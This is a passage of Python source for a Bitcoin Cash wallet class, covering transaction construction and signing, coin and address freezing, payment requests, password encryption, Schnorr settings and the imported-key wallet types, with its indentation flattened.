outputs[i_max] = (_type, data, 0)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
fee = fee_estimator(tx.estimated_size())
amount = max(0, sendable - tx.output_value() - fee)
outputs[i_max] = (_type, data, amount)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
# If the user tries to attach an excessive fee (more than 100 sat/byte, matching the check below), stop them from shooting themselves in the foot
tx_in_bytes=tx.estimated_size()
fee_in_satoshis=tx.get_fee()
sats_per_byte=fee_in_satoshis/tx_in_bytes
if (sats_per_byte > 100):
raise ExcessiveFee()
# Sort the inputs and outputs deterministically
tx.BIP_LI01_sort()
# Timelock tx to current height.
locktime = self.get_local_height()
if locktime == -1: # We have no local height data (no headers synced).
locktime = 0
tx.locktime = locktime
run_hook('make_unsigned_transaction', self, tx)
return tx
def mktx(self, outputs, password, config, fee=None, change_addr=None, domain=None, sign_schnorr=None):
coins = self.get_spendable_coins(domain, config)
tx = self.make_unsigned_transaction(coins, outputs, config, fee, change_addr, sign_schnorr=sign_schnorr)
self.sign_transaction(tx, password)
return tx
def is_frozen(self, addr):
""" Address-level frozen query. Note: this is set/unset independent of
'coin' level freezing. """
assert isinstance(addr, Address)
return addr in self.frozen_addresses
def is_frozen_coin(self, utxo: Union[str, dict, Set[str]]) -> Union[bool, Set[str]]:
""" 'coin' level frozen query. Note: this is set/unset independent of
address-level freezing.
`utxo` is a prevout:n string, or a dict as returned from get_utxos(),
in which case a bool is returned.
`utxo` may also be a set of prevout:n strings in which case a set is
returned which is the intersection of the internal frozen coin sets
and the `utxo` set. """
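# Illustrative calls for the three accepted input forms (values hypothetical):
#
#   wallet.is_frozen_coin('aa..ff:0')                 # -> bool
#   wallet.is_frozen_coin(coin_dict)                  # -> bool; also refreshes coin_dict['is_frozen_coin']
#   wallet.is_frozen_coin({'aa..ff:0', 'bb..00:1'})   # -> the frozen subset of the given set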
assert isinstance(utxo, (str, dict, set))
if isinstance(utxo, dict):
name = ("{}:{}".format(utxo['prevout_hash'], utxo['prevout_n']))
ret = name in self.frozen_coins or name in self.frozen_coins_tmp
if ret != utxo['is_frozen_coin']:
self.print_error("*** WARNING: utxo has stale is_frozen_coin flag", name)
utxo['is_frozen_coin'] = ret # update stale flag
return ret
elif isinstance(utxo, set):
# set is returned
return (self.frozen_coins | self.frozen_coins_tmp) & utxo
else:
return utxo in self.frozen_coins or utxo in self.frozen_coins_tmp
def set_frozen_state(self, addrs, freeze):
"""Set frozen state of the addresses to `freeze`, True or False. Note
that address-level freezing is set/unset independent of coin-level
freezing, however both must be satisfied for a coin to be defined as
spendable."""
if all(self.is_mine(addr) for addr in addrs):
if freeze:
self.frozen_addresses |= set(addrs)
else:
self.frozen_addresses -= set(addrs)
frozen_addresses = [addr.to_storage_string()
for addr in self.frozen_addresses]
self.storage.put('frozen_addresses', frozen_addresses)
return True
return False
def set_frozen_coin_state(self, utxos, freeze, *, temporary=False):
"""Set frozen state of the `utxos` to `freeze`, True or False. `utxos`
is a (possibly mixed) list of either "prevout:n" strings and/or
coin-dicts as returned from get_utxos(). Note that if passing prevout:n
strings as input, 'is_mine()' status is not checked for the specified
coin. Also note that coin-level freezing is set/unset independent of
address-level freezing, however both must be satisfied for a coin to be
defined as spendable.
The `temporary` flag only applies if `freeze = True`. In that case,
freezing coins will only affect the in-memory-only frozen set, which
doesn't get saved to storage. This mechanism was added so that plugins
(such as CashFusion) have a mechanism for ephemeral coin freezing that
doesn't persist across sessions.
Note that setting `freeze = False` effectively unfreezes both the
temporary and the permanent frozen coin sets all in 1 call. Thus after a
call to `set_frozen_coin_state(utxos, False)`, both the temporary and the
persistent frozen sets are cleared of all coins in `utxos`."""
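# Sketch of the ephemeral-freeze pattern described above (as used by plugins
# such as CashFusion; values illustrative):
#
#   n = wallet.set_frozen_coin_state(utxos, True, temporary=True)  # in-memory only
#   ...  # do work while the coins are held back from coin selection
#   wallet.set_frozen_coin_state(utxos, False)  # clears temp *and* persistent sets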
add_set = self.frozen_coins if not temporary else self.frozen_coins_tmp
def add(utxo):
add_set.add(utxo)
def discard(utxo):
self.frozen_coins.discard(utxo)
self.frozen_coins_tmp.discard(utxo)
apply_operation = add if freeze else discard
original_size = len(self.frozen_coins)
with self.lock:
ok = 0
for utxo in utxos:
if isinstance(utxo, str):
apply_operation(utxo)
ok += 1
elif isinstance(utxo, dict):
txo = "{}:{}".format(utxo['prevout_hash'], utxo['prevout_n'])
apply_operation(txo)
utxo['is_frozen_coin'] = bool(freeze)
ok += 1
if original_size != len(self.frozen_coins):
# Performance optimization: only set storage if the perma-set
# changed.
self.storage.put('frozen_coins', list(self.frozen_coins))
return ok
def prepare_for_verifier(self):
# review transactions that are in the history
for addr, hist in self._history.items():
for tx_hash, tx_height in hist:
# add it in case it was previously unconfirmed
self.add_unverified_tx(tx_hash, tx_height)
# if we are on a pruning server, remove unverified transactions
with self.lock:
vr = list(self.verified_tx.keys()) + list(self.unverified_tx.keys())
for tx_hash in list(self.transactions):
if tx_hash not in vr:
self.print_error("removing transaction", tx_hash)
self.transactions.pop(tx_hash)
def start_threads(self, network):
self.network = network
if self.network:
self.start_pruned_txo_cleaner_thread()
self.prepare_for_verifier()
self.verifier = SPV(self.network, self)
self.synchronizer = Synchronizer(self, network)
finalization_print_error(self.verifier)
finalization_print_error(self.synchronizer)
network.add_jobs([self.verifier, self.synchronizer])
self.cashacct.start(self.network) # start cashacct network-dependent subsystem, network.add_jobs, etc
else:
self.verifier = None
self.synchronizer = None
def stop_threads(self):
if self.network:
# Note: synchronizer and verifier will remove themselves from the
# network thread the next time they run, as a result of the below
# release() calls.
# It is done this way (as opposed to an immediate clean-up here)
# because these objects need to do their clean-up actions in a
# thread-safe fashion from within the thread where they normally
# operate on their data structures.
self.cashacct.stop()
self.synchronizer.release()
self.verifier.release()
self.synchronizer = None
self.verifier = None
self.stop_pruned_txo_cleaner_thread()
# Now no references to the synchronizer or verifier
# remain so they will be GC-ed
self.storage.put('stored_height', self.get_local_height())
self.save_addresses()
self.save_transactions()
self.save_verified_tx() # implicit cashacct.save
self.storage.put('frozen_coins', list(self.frozen_coins))
self.save_change_reservations()
self.storage.write()
def start_pruned_txo_cleaner_thread(self):
self.pruned_txo_cleaner_thread = threading.Thread(target=self._clean_pruned_txo_thread, daemon=True, name='clean_pruned_txo_thread')
self.pruned_txo_cleaner_thread.q = queue.Queue()
self.pruned_txo_cleaner_thread.start()
def stop_pruned_txo_cleaner_thread(self):
t = self.pruned_txo_cleaner_thread
self.pruned_txo_cleaner_thread = None # this also signals a stop
if t and t.is_alive():
t.q.put(None) # signal stop
# if the join times out, it's ok. it means the thread was stuck in
# a network call and it will eventually exit.
t.join(timeout=3.0)
def wait_until_synchronized(self, callback=None, *, timeout=None):
tstart = time.time()
def check_timed_out():
if timeout is not None and time.time() - tstart > timeout:
raise TimeoutException()
def wait_for_wallet():
self.set_up_to_date(False)
while not self.is_up_to_date():
if callback:
msg = "%s\n%s %d"%(
_("Please wait..."),
_("Addresses generated:"),
len(self.addresses(True)))
callback(msg)
time.sleep(0.1)
check_timed_out()
def wait_for_network():
while not self.network.is_connected():
if callback:
msg = "%s \n" % (_("Connecting..."))
callback(msg)
time.sleep(0.1)
check_timed_out()
# wait until we are connected, because the user
# might have selected another server
if self.network:
wait_for_network()
wait_for_wallet()
else:
self.synchronize()
def can_export(self):
return not self.is_watching_only() and hasattr(self.keystore, 'get_private_key')
def is_used(self, address):
return self.get_address_history(address) and self.is_empty(address)
def is_empty(self, address):
assert isinstance(address, Address)
return not any(self.get_addr_balance(address))
def address_is_old(self, address, age_limit=2):
age = -1
local_height = self.get_local_height()
for tx_hash, tx_height in self.get_address_history(address):
if tx_height == 0:
tx_age = 0
else:
tx_age = local_height - tx_height + 1
if tx_age > age:
age = tx_age
if age > age_limit:
break  # ok, it's old; no need to keep looping
return age > age_limit
def cpfp(self, tx, fee, sign_schnorr=None):
''' sign_schnorr is a bool or None for auto '''
sign_schnorr = self.is_schnorr_enabled() if sign_schnorr is None else bool(sign_schnorr)
txid = tx.txid()
for i, o in enumerate(tx.outputs()):
otype, address, value = o
if otype == bitcoin.TYPE_ADDRESS and self.is_mine(address):
break
else:
return
coins = self.get_addr_utxo(address)
item = coins.get(txid+':%d'%i)
if not item:
return
self.add_input_info(item)
inputs = [item]
outputs = [(bitcoin.TYPE_ADDRESS, address, value - fee)]
locktime = self.get_local_height()
# note: no need to call tx.BIP_LI01_sort() here - single input/output
return Transaction.from_io(inputs, outputs, locktime=locktime, sign_schnorr=sign_schnorr)
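# A minimal CPFP usage sketch (fee value illustrative; the caller still has
# to broadcast the result):
#
#   child = wallet.cpfp(parent_tx, fee=500)
#   if child is not None:
#       wallet.sign_transaction(child, password)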
def add_input_info(self, txin):
address = txin['address']
if self.is_mine(address):
txin['type'] = self.get_txin_type(address)
# Bitcoin Cash needs value to sign
received, spent = self.get_addr_io(address)
item = received.get(txin['prevout_hash']+':%d'%txin['prevout_n'])
tx_height, value, is_cb = item
txin['value'] = value
self.add_input_sig_info(txin, address)
def can_sign(self, tx):
if tx.is_complete():
return False
for k in self.get_keystores():
# setup "wallet advice" so Xpub wallets know how to sign 'fd' type tx inputs
# by giving them the sequence number ahead of time
if isinstance(k, BIP32_KeyStore):
for txin in tx.inputs():
for x_pubkey in txin['x_pubkeys']:
_, addr = xpubkey_to_address(x_pubkey)
try:
c, index = self.get_address_index(addr)
except:
continue
if index is not None:
k.set_wallet_advice(addr, [c,index])
if k.can_sign(tx):
return True
return False
def get_input_tx(self, tx_hash):
# First look up an input transaction in the wallet where it
# will likely be. If co-signing a transaction it may not have
# all the input txs, in which case we ask the network.
tx = self.transactions.get(tx_hash)
if not tx and self.network:
request = ('blockchain.transaction.get', [tx_hash])
tx = Transaction(self.network.synchronous_get(request))
return tx
def add_input_values_to_tx(self, tx):
""" add input values to the tx, for signing"""
for txin in tx.inputs():
if 'value' not in txin:
inputtx = self.get_input_tx(txin['prevout_hash'])
if inputtx is not None:
out_zero, out_addr, out_val = inputtx.outputs()[txin['prevout_n']]
txin['value'] = out_val
txin['prev_tx'] = inputtx # may be needed by hardware wallets
def add_hw_info(self, tx):
# add previous tx for hw wallets, if needed and not already there
if any([(isinstance(k, Hardware_KeyStore) and k.can_sign(tx) and k.needs_prevtx()) for k in self.get_keystores()]):
for txin in tx.inputs():
if 'prev_tx' not in txin:
txin['prev_tx'] = self.get_input_tx(txin['prevout_hash'])
# add output info for hw wallets
info = {}
xpubs = self.get_master_public_keys()
for txout in tx.outputs():
_type, addr, amount = txout
if self.is_change(addr):
index = self.get_address_index(addr)
pubkeys = self.get_public_keys(addr)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
info[addr] = index, sorted_xpubs, self.m if isinstance(self, Multisig_Wallet) else None, self.txin_type
tx.output_info = info
def sign_transaction(self, tx, password, *, use_cache=False):
""" Sign a transaction, requires password (may be None for password-less
wallets). If `use_cache` is enabled then signing will be much faster.
For transactions with N inputs and M outputs, calculating all sighashes
takes only O(N + M) with the cache, as opposed to O(N^2 + NM) without
the cache.
Warning: If you modify non-signature parts of the transaction
afterwards, do not use `use_cache`! """
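# A minimal signing sketch (assumes `tx` came from make_unsigned_transaction()
# above and `password` unlocks the keystore):
#
#   if wallet.can_sign(tx):
#       wallet.sign_transaction(tx, password, use_cache=True)
#   # tx.is_complete() may still be False for multisig co-signing setups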
if self.is_watching_only():
return
# add input values for signing
self.add_input_values_to_tx(tx)
# hardware wallets require extra info
if any([(isinstance(k, Hardware_KeyStore) and k.can_sign(tx)) for k in self.get_keystores()]):
self.add_hw_info(tx)
# sign
for k in self.get_keystores():
try:
if k.can_sign(tx):
k.sign_transaction(tx, password, use_cache=use_cache)
except UserCancelled:
continue
def get_unused_addresses(self, *, for_change=False, frozen_ok=True):
# fixme: use slots from expired requests
with self.lock:
domain = self.get_receiving_addresses() if not for_change else (self.get_change_addresses() or self.get_receiving_addresses())
return [addr for addr in domain
if not self.get_address_history(addr)
and addr not in self.receive_requests
and (frozen_ok or addr not in self.frozen_addresses)]
def get_unused_address(self, *, for_change=False, frozen_ok=True):
addrs = self.get_unused_addresses(for_change=for_change, frozen_ok=frozen_ok)
if addrs:
return addrs[0]
def get_receiving_address(self, *, frozen_ok=True):
'''Returns a receiving address or None.'''
domain = self.get_unused_addresses(frozen_ok=frozen_ok)
if not domain:
domain = [a for a in self.get_receiving_addresses()
if frozen_ok or a not in self.frozen_addresses]
if domain:
return domain[0]
def get_payment_status(self, address, amount):
local_height = self.get_local_height()
received, sent = self.get_addr_io(address)
l = []
for txo, x in received.items():
h, v, is_cb = x
txid, n = txo.split(':')
info = self.verified_tx.get(txid)
if info:
tx_height, timestamp, pos = info
conf = local_height - tx_height
else:
conf = 0
l.append((conf, v))
vsum = 0
for conf, v in reversed(sorted(l)):
vsum += v
if vsum >= amount:
return True, conf
return False, None
def has_payment_request(self, addr):
''' Returns True iff Address addr has any extant payment requests
(even if expired), False otherwise. '''
assert isinstance(addr, Address)
return bool(self.receive_requests.get(addr))
def get_payment_request(self, addr, config):
assert isinstance(addr, Address)
r = self.receive_requests.get(addr)
if not r:
return
out = copy.copy(r)
addr_text = addr.to_full_ui_string()
amount_text = format_satoshis(r['amount']) # fixme: this should not be localized
out['URI'] = '{}?amount={}'.format(addr_text, amount_text)
status, conf = self.get_request_status(addr)
out['status'] = status
if conf is not None:
out['confirmations'] = conf
# check if bip70 file exists
rdir = config.get('requests_dir')
if rdir:
key = out.get('id', addr.to_storage_string())
path = os.path.join(rdir, 'req', key[0], key[1], key)
if os.path.exists(path):
baseurl = 'file://' + rdir
rewrite = config.get('url_rewrite')
if rewrite:
baseurl = baseurl.replace(*rewrite)
out['request_url'] = os.path.join(baseurl, 'req', key[0], key[1], key, key)
out['URI'] += '&r=' + out['request_url']
                if 'index_url' not in out:
out['index_url'] = os.path.join(baseurl, 'index.html') + '?id=' + key
websocket_server_announce = config.get('websocket_server_announce')
if websocket_server_announce:
out['websocket_server'] = websocket_server_announce
else:
out['websocket_server'] = config.get('websocket_server', 'localhost')
websocket_port_announce = config.get('websocket_port_announce')
if websocket_port_announce:
out['websocket_port'] = websocket_port_announce
else:
out['websocket_port'] = config.get('websocket_port', 9999)
return out
def get_request_status(self, key):
r = self.receive_requests.get(key)
if r is None:
return PR_UNKNOWN
address = r['address']
amount = r.get('amount')
timestamp = r.get('time', 0)
if timestamp and type(timestamp) != int:
timestamp = 0
expiration = r.get('exp')
if expiration and type(expiration) != int:
expiration = 0
conf = None
if amount:
paid, conf = self.get_payment_status(address, amount)
status = PR_PAID if paid else PR_UNPAID
if status == PR_UNPAID and expiration is not None and time.time() > timestamp + expiration:
status = PR_EXPIRED
else:
status = PR_UNKNOWN
return status, conf
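    # Payment-request lifecycle (descriptive note, not additional API): a
    # request dict is built by make_payment_request() below, persisted and
    # optionally written out as a BIP70 file by add_payment_request(), rendered
    # for the UI by get_payment_request(), and polled via get_request_status(),
    # which reports PR_UNPAID / PR_PAID / PR_EXPIRED (or PR_UNKNOWN for an
    # unknown key), together with a confirmation count once paid.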
def make_payment_request(self, addr, amount, message, expiration=None, *,
op_return=None, op_return_raw=None, payment_url=None, index_url=None):
assert isinstance(addr, Address)
if op_return and op_return_raw:
raise ValueError("both op_return and op_return_raw cannot be specified as arguments to make_payment_request")
timestamp = int(time.time())
_id = bh2u(bitcoin.Hash(
addr.to_storage_string() + "%d" % timestamp))[0:10]
d = {
'time': timestamp,
'amount': amount,
'exp': expiration,
'address': addr,
'memo': message,
'id': _id
}
if payment_url:
d['payment_url'] = payment_url + "/" + _id
if index_url:
d['index_url'] = index_url + "/" + _id
if op_return:
d['op_return'] = op_return
if op_return_raw:
d['op_return_raw'] = op_return_raw
return d
def serialize_request(self, r):
result = r.copy()
result['address'] = r['address'].to_storage_string()
return result
def save_payment_requests(self):
def delete_address(value):
del value['address']
return value
requests = {addr.to_storage_string() : delete_address(value.copy())
for addr, value in self.receive_requests.items()}
self.storage.put('payment_requests', requests)
self.storage.write()
def sign_payment_request(self, key, alias, alias_addr, password):
req = self.receive_requests.get(key)
alias_privkey = self.export_private_key(alias_addr, password)
pr = paymentrequest.make_unsigned_request(req)
paymentrequest.sign_request_with_alias(pr, alias, alias_privkey)
req['name'] = to_string(pr.pki_data)
req['sig'] = bh2u(pr.signature)
self.receive_requests[key] = req
self.save_payment_requests()
def add_payment_request(self, req, config, set_address_label=True):
addr = req['address']
addr_text = addr.to_storage_string()
amount = req['amount']
message = req['memo']
self.receive_requests[addr] = req
self.save_payment_requests()
if set_address_label:
self.set_label(addr_text, message) # should be a default label
rdir = config.get('requests_dir')
if rdir and amount is not None:
key = req.get('id', addr_text)
pr = paymentrequest.make_request(config, req)
path = os.path.join(rdir, 'req', key[0], key[1], key)
if not os.path.exists(path):
try:
os.makedirs(path)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
with open(os.path.join(path, key), 'wb') as f:
f.write(pr.SerializeToString())
# reload
req = self.get_payment_request(addr, config)
req['address'] = req['address'].to_full_ui_string()
with open(os.path.join(path, key + '.json'), 'w', encoding='utf-8') as f:
f.write(json.dumps(req))
def remove_payment_request(self, addr, config, clear_address_label_if_no_tx=True):
if isinstance(addr, str):
addr = Address.from_string(addr)
if addr not in self.receive_requests:
return False
r = self.receive_requests.pop(addr)
if clear_address_label_if_no_tx and not self.get_address_history(addr):
memo = r.get('memo')
# clear it only if the user didn't overwrite it with something else
if memo and memo == self.labels.get(addr.to_storage_string()):
self.set_label(addr, None)
rdir = config.get('requests_dir')
if rdir:
key = r.get('id', addr.to_storage_string())
for s in ['.json', '']:
n = os.path.join(rdir, 'req', key[0], key[1], key, key + s)
if os.path.exists(n):
os.unlink(n)
self.save_payment_requests()
return True
def get_sorted_requests(self, config):
m = map(lambda x: self.get_payment_request(x, config), self.receive_requests.keys())
try:
            def f(x):
                addr = x['address']
                try:
                    return self.get_address_index(addr) or addr
                except Exception:
                    return addr
return sorted(m, key=f)
except TypeError:
            # See issue #1231 -- can get inhomogeneous results in the above
# sorting function due to the 'or addr' possible return.
# This can happen if addresses for some reason drop out of wallet
# while, say, the history rescan is running and it can't yet find
# an address index for an address. In that case we will
# return an unsorted list to the caller.
return list(m)
def get_fingerprint(self):
raise NotImplementedError()
def can_import_privkey(self):
return False
def can_import_address(self):
return False
def can_delete_address(self):
return False
def is_multisig(self):
# Subclass Multisig_Wallet overrides this
return False
def is_hardware(self):
return any([isinstance(k, Hardware_KeyStore) for k in self.get_keystores()])
def add_address(self, address):
assert isinstance(address, Address)
self._addr_bal_cache.pop(address, None) # paranoia, not really necessary -- just want to maintain the invariant that when we modify address history below we invalidate cache.
self.invalidate_address_set_cache()
if address not in self._history:
self._history[address] = []
if self.synchronizer:
self.synchronizer.add(address)
self.cashacct.on_address_addition(address)
def has_password(self):
return self.has_keystore_encryption() or self.has_storage_encryption()
def can_have_keystore_encryption(self):
return self.keystore and self.keystore.may_have_password()
def get_available_storage_encryption_version(self):
"""Returns the type of storage encryption offered to the user.
A wallet file (storage) is either encrypted with this version
or is stored in plaintext.
"""
if isinstance(self.keystore, Hardware_KeyStore):
return STO_EV_XPUB_PW
else:
return STO_EV_USER_PW
def has_keystore_encryption(self):
"""Returns whether encryption is enabled for the keystore.
If True, e.g. signing a transaction will require a password.
"""
if self.can_have_keystore_encryption():
return self.storage.get('use_encryption', False)
return False
def has_storage_encryption(self):
"""Returns whether encryption is enabled for the wallet file on disk."""
return self.storage.is_encrypted()
@classmethod
def may_have_password(cls):
return True
def check_password(self, password):
if self.has_keystore_encryption():
self.keystore.check_password(password)
self.storage.check_password(password)
def update_password(self, old_pw, new_pw, encrypt_storage=False):
if old_pw is None and self.has_password():
raise InvalidPassword()
self.check_password(old_pw)
if encrypt_storage:
enc_version = self.get_available_storage_encryption_version()
else:
enc_version = STO_EV_PLAINTEXT
self.storage.set_password(new_pw, enc_version)
# note: Encrypting storage with a hw device is currently only
# allowed for non-multisig wallets. Further,
# Hardware_KeyStore.may_have_password() == False.
# If these were not the case,
# extra care would need to be taken when encrypting keystores.
self._update_password_for_keystore(old_pw, new_pw)
encrypt_keystore = self.can_have_keystore_encryption()
self.storage.set_keystore_encryption(bool(new_pw) and encrypt_keystore)
self.storage.write()
def sign_message(self, address, message, password):
index = self.get_address_index(address)
return self.keystore.sign_message(index, message, password)
def decrypt_message(self, pubkey, message, password):
addr = self.pubkeys_to_address(pubkey)
index = self.get_address_index(addr)
return self.keystore.decrypt_message(index, message, password)
def rebuild_history(self):
''' This is an advanced function for use in the GUI when the user
wants to resynch the whole wallet from scratch, preserving labels
and contacts. '''
if not self.network or not self.network.is_connected():
raise RuntimeError('Refusing to rebuild wallet without a valid server connection!')
if not self.synchronizer or not self.verifier:
raise RuntimeError('Refusing to rebuild a stopped wallet!')
network = self.network
self.stop_threads()
do_addr_save = False
with self.lock:
self.transactions.clear(); self.unverified_tx.clear(); self.verified_tx.clear()
self.clear_history()
if isinstance(self, Standard_Wallet):
# reset the address list to default too, just in case. New synchronizer will pick up the addresses again.
self.receiving_addresses, self.change_addresses = self.receiving_addresses[:self.gap_limit], self.change_addresses[:self.gap_limit_for_change]
do_addr_save = True
self.change_reserved.clear()
self.change_reserved_default.clear()
self.change_unreserved.clear()
self.change_reserved_tmp.clear()
self.invalidate_address_set_cache()
if do_addr_save:
self.save_addresses()
self.save_transactions()
self.save_change_reservations()
self.save_verified_tx() # implicit cashacct.save
self.storage.write()
self.start_threads(network)
self.network.trigger_callback('wallet_updated', self)
def is_schnorr_possible(self, reason: list = None) -> bool:
        ''' Returns True if this wallet type is compatible with Schnorr signing.
        `reason` is an optional list; on a False return, a translated string
        explaining why Schnorr isn't possible is inserted into it. '''
ok = bool(not self.is_multisig() and not self.is_hardware())
if not ok and isinstance(reason, list):
reason.insert(0, _('Schnorr signatures are disabled for this wallet type.'))
return ok
def is_schnorr_enabled(self) -> bool:
''' Returns whether schnorr is enabled AND possible for this wallet.
Schnorr is enabled per-wallet. '''
if not self.is_schnorr_possible():
# Short-circuit out of here -- it's not even possible with this
# wallet type.
return False
ss_cfg = self.storage.get('sign_schnorr', None)
if ss_cfg is None:
# Schnorr was not set in config; figure out intelligent defaults,
# preferring Schnorr if it's at least as fast as ECDSA (based on
# which libs user has installed). Note for watching-only we default
# to off if unspecified regardless, to not break compatibility
# with air-gapped signing systems that have older EC installed
# on the signing system. This is to avoid underpaying fees if
# signing system doesn't use Schnorr. We can turn on default
# Schnorr on watching-only sometime in the future after enough
            # time has passed that air-gapped systems can reasonably be
            # expected to have Schnorr enabled by default.
# TO DO: Finish refactor of txn serialized format to handle this
# case better!
if (not self.is_watching_only()
and (schnorr.has_fast_sign()
or not ecc_fast.is_using_fast_ecc())):
# Prefer Schnorr, all things being equal.
# - If not watching-only & schnorr possible AND
# - Either Schnorr is fast sign (native, ABC's secp256k1),
# so use it by default
# - Or both ECDSA & Schnorr are slow (non-native);
# so use Schnorr in that case as well
ss_cfg = 2
else:
# This branch is reached if Schnorr is slow but ECDSA is fast
# (core's secp256k1 lib was found which lacks Schnorr) -- so we
# default it to off. Also if watching only we default off.
ss_cfg = 0
return bool(ss_cfg)
def set_schnorr_enabled(self, b: bool):
        ''' Enable schnorr for this wallet. Note that if Schnorr is not possible
        (due to missing libs or invalid wallet type), is_schnorr_enabled() will
        still return False after calling this function with a True argument. '''
# Note: we will have '1' at some point in the future which will mean:
# 'ask me per tx', so for now True -> 2.
self.storage.put('sign_schnorr', 2 if b else 0)
class Simple_Wallet(Abstract_Wallet):
# wallet with a single keystore
def get_keystore(self):
return self.keystore
def get_keystores(self):
return [self.keystore]
def is_watching_only(self):
return self.keystore.is_watching_only()
def _update_password_for_keystore(self, old_pw, new_pw):
if self.keystore and self.keystore.may_have_password():
self.keystore.update_password(old_pw, new_pw)
self.save_keystore()
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
class ImportedWalletBase(Simple_Wallet):
txin_type = 'p2pkh'
def get_txin_type(self, address):
return self.txin_type
def can_delete_address(self):
return len(self.get_addresses()) > 1 # Cannot delete the last address
def has_seed(self):
return False
def is_deterministic(self):
return False
def is_change(self, address):
return False
def get_master_public_keys(self):
return []
def is_beyond_limit(self, address, is_change):
return False
def get_fingerprint(self):
return ''
def get_receiving_addresses(self):
return self.get_addresses()
def delete_address(self, address):
assert isinstance(address, Address)
all_addrs = self.get_addresses()
if len(all_addrs) <= 1 or address not in all_addrs:
return
del all_addrs
transactions_to_remove = set() # only referred to by this address
transactions_new = set() # txs that are not only referred to by address
with self.lock:
for addr, details in self._history.items():
if addr == address:
for tx_hash, height in details:
transactions_to_remove.add(tx_hash)
self.tx_addr_hist[tx_hash].discard(address)
if not self.tx_addr_hist.get(tx_hash):
self.tx_addr_hist.pop(tx_hash, None)
else:
for tx_hash, height in details:
transactions_new.add(tx_hash)
transactions_to_remove -= transactions_new
self._history.pop(address, None)
for tx_hash in transactions_to_remove:
self.remove_transaction(tx_hash)
self.tx_fees.pop(tx_hash, None)
self.verified_tx.pop(tx_hash, None)
self.unverified_tx.pop(tx_hash, None)
self.transactions.pop(tx_hash, None)
self._addr_bal_cache.pop(address, None) # not strictly necessary, above calls also have this side-effect. but here to be safe. :)
if self.verifier:
# TX is now gone. Toss its SPV proof in case we have it
# in memory. This allows user to re-add PK again and it
# will avoid the situation where the UI says "not verified"
# erroneously!
self.verifier.remove_spv_proof_for_tx(tx_hash)
# FIXME: what about pruned_txo?
self.storage.put('verified_tx3', self.verified_tx)
self.save_transactions()
self.set_label(address, None)
self.remove_payment_request(address, {})
self.set_frozen_state([address], False)
self.delete_address_derived(address)
self.cashacct.on_address_deletion(address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if above already wrote
class ImportedAddressWallet(ImportedWalletBase):
# Watch-only wallet of imported addresses
wallet_type = 'imported_addr'
def __init__(self, storage):
self._sorted = None
super().__init__(storage)
@classmethod
def from_text(cls, storage, text):
wallet = cls(storage)
for address in text.split():
wallet.import_address(Address.from_string(address))
return wallet
def is_watching_only(self):
return True
def get_keystores(self):
return []
def can_import_privkey(self):
return False
def load_keystore(self):
self.keystore = None
def save_keystore(self):
pass
def load_addresses(self):
addresses = self.storage.get('addresses', [])
self.addresses = [Address.from_string(addr) for addr in addresses]
def save_addresses(self):
self.storage.put('addresses', [addr.to_storage_string()
for addr in self.addresses])
self.storage.write()
def can_change_password(self):
return False
def can_import_address(self):
return True
def get_addresses(self):
if not self._sorted:
self._sorted = sorted(self.addresses,
key=lambda addr: addr.to_full_ui_string())
return self._sorted
def import_address(self, address):
assert isinstance(address, Address)
if address in self.addresses:
return False
self.addresses.append(address)
self.add_address(address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if already wrote in previous call
self._sorted = None
return True
def delete_address_derived(self, address):
self.addresses.remove(address)
self._sorted.remove(address)
def add_input_sig_info(self, txin, address):
x_pubkey = 'fd' + address.to_script_hex()
txin['x_pubkeys'] = [x_pubkey]
txin['signatures'] = [None]
class ImportedPrivkeyWallet(ImportedWalletBase):
# wallet made of imported private keys
wallet_type = 'imported_privkey'
def __init__(self, storage):
Abstract_Wallet.__init__(self, storage)
@classmethod
def from_text(cls, storage, text, password=None):
wallet = cls(storage)
storage.put('use_encryption', bool(password))
for privkey in text.split():
wallet.import_private_key(privkey, password)
return wallet
def is_watching_only(self):
return False
def get_keystores(self):
return [self.keystore]
def can_import_privkey(self):
return True
def load_keystore(self):
if self.storage.get('keystore'):
self.keystore = load_keystore(self.storage, 'keystore')
else:
self.keystore = Imported_KeyStore({})
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
def load_addresses(self):
pass
def save_addresses(self):
pass
def can_change_password(self):
return True
def can_import_address(self):
return False
def get_addresses(self):
return self.keystore.get_addresses()
def delete_address_derived(self, address):
self.keystore.remove_address(address)
self.save_keystore()
def get_address_index(self, address):
return self.get_public_key(address)
def get_public_key(self, address):
return self.keystore.address_to_pubkey(address)
def import_private_key(self, sec, pw):
pubkey = self.keystore.import_privkey(sec, pw)
self.save_keystore()
self.add_address(pubkey.address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if above already wrote
return pubkey.address.to_full_ui_string()
def export_private_key(self, address, password):
'''Returned in WIF format.'''
pubkey = self.keystore.address_to_pubkey(address)
return self.keystore.export_private_key(pubkey, password)
def add_input_sig_info(self, txin, address):
assert txin['type'] == 'p2pkh'
pubkey = self.keystore.address_to_pubkey(address)
txin['num_sig'] = 1
txin['x_pubkeys'] = [pubkey.to_ui_string()]
txin['signatures'] = [None]
def pubkeys_to_address(self, pubkey):
pubkey = PublicKey.from_string(pubkey)
if pubkey in self.keystore.keypairs:
return pubkey.address
class Deterministic_Wallet(Abstract_Wallet):
def __init__(self, storage):
Abstract_Wallet.__init__(self, storage)
self.gap_limit = storage.get('gap_limit', 20)
def has_seed(self):
return self.keystore.has_seed()
def get_receiving_addresses(self):
return self.receiving_addresses
def get_change_addresses(self):
return self.change_addresses
def get_seed(self, password):
return self.keystore.get_seed(password)
def add_seed(self, seed, pw):
self.keystore.add_seed(seed, pw)
def change_gap_limit(self, value):
'''This method is not called in the code, it is kept for console use'''
with self.lock:
if value >= self.gap_limit:
self.gap_limit = value
self.storage.put('gap_limit', self.gap_limit)
return True
elif value >= self.min_acceptable_gap():
addresses = self.get_receiving_addresses()
k = self.num_unused_trailing_addresses(addresses)
n = len(addresses) - k + value
self.receiving_addresses = self.receiving_addresses[0:n]
self.gap_limit = value
self.storage.put('gap_limit', self.gap_limit)
self.save_addresses()
return True
else:
return False
def num_unused_trailing_addresses(self, addresses):
'''This method isn't called anywhere. Perhaps it is here for console use.
Can't be sure. -Calin '''
